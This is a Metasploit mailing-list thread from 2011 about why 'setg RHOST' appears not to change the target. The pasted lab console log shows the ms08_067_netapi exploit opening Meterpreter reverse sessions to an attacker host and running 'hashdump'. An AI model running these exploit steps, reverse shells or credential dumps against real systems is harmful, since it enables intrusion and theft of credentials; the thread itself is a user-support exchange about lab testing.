Metasploit mailing list archives
Re: [RHOST] bug ?
From: Joshua Smith <lazydj98 () gmail com>
Date: Thu, 20 Oct 2011 13:29:16 -0400
Yeah, i'd have to examine the source, but I believe it's something like (in pseudo code) ldatastore['RHOST'] || gdatastore['RHOST'] so global datastore is more like the default. However, if there's no local, the local becomes the value of global so when you do the next setg, you're changing the default, however there's a local defined now, cuz you're using the exact same module and therefore the module instance hasn't changed, which would otherwise wipe out the local datastore. so I think if you changed to a different module, the setg would be all you needed, but staying in that module you've created a local I'm not a dev tho, I'm just an avid user ;) -Josh On Thu, Oct 20, 2011 at 12:17 PM, cons0ul <sachinshinde11 () gmail com> wrote:
yeah silly me it happens here msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.61 RHOST => 192.168.1.61 its interesting RHOST is global and local variable .... is this variable overriding ? thanks, cons0ul On Thu, Oct 20, 2011 at 6:37 PM, Joshua Smith <lazydj98 () gmail com> wrote:No, just use set the second time instead of setg. The global datastore is used if there's nothing in the local store, which is the case in your scenario. -Josh On Oct 20, 2011, at 4:16 AM, cons0ul <sachinshinde11 () gmail com> wrote:msf exploit(ms08_067_netapi) > version Framework: 4.1.0-release.13988 Console : 4.1.0-release.13581 :) On Thu, Oct 20, 2011 at 1:43 PM, cons0ul <sachinshinde11 () gmail com> wrote:Hi , I was just testing smb exploits in our testing lab and this is what i did msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.61 RHOST => 192.168.1.61 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.7:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] We could not detect the language pack, defaulting to English [*] Selected Target: Windows 2003 SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.61 [*] Meterpreter session 1 opened (192.168.1.7:4444 -> 192.168.1.61:1977) at 2011-10-20 13:32:46 +0530 meterpreter > hashdump meterpreter > background msf exploit(ms08_067_netapi) > setg RHOST 192.168.1.62 RHOST => 192.168.1.62 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.1.7:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown [*] We could not detect the language pack, defaulting to English [*] Selected Target: Windows 2003 SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.61 [*] Meterpreter session 2 opened (192.168.1.7:4444 -> 192.168.1.61:1978) at 2011-10-20 13:33:56 +0530 is it a bug ? thanks, cons0ul_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- - Josh _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- [RHOST] bug ? cons0ul (Oct 20)
- Re: [RHOST] bug ? cons0ul (Oct 20)
- Re: [RHOST] bug ? Joshua Smith (Oct 20)
- Re: [RHOST] bug ? Robin Wood (Oct 20)
- Message not available
- Re: [RHOST] bug ? Joshua Smith (Oct 20)
- Re: [RHOST] bug ? Joshua Smith (Oct 20)
- Re: [RHOST] bug ? cons0ul (Oct 20)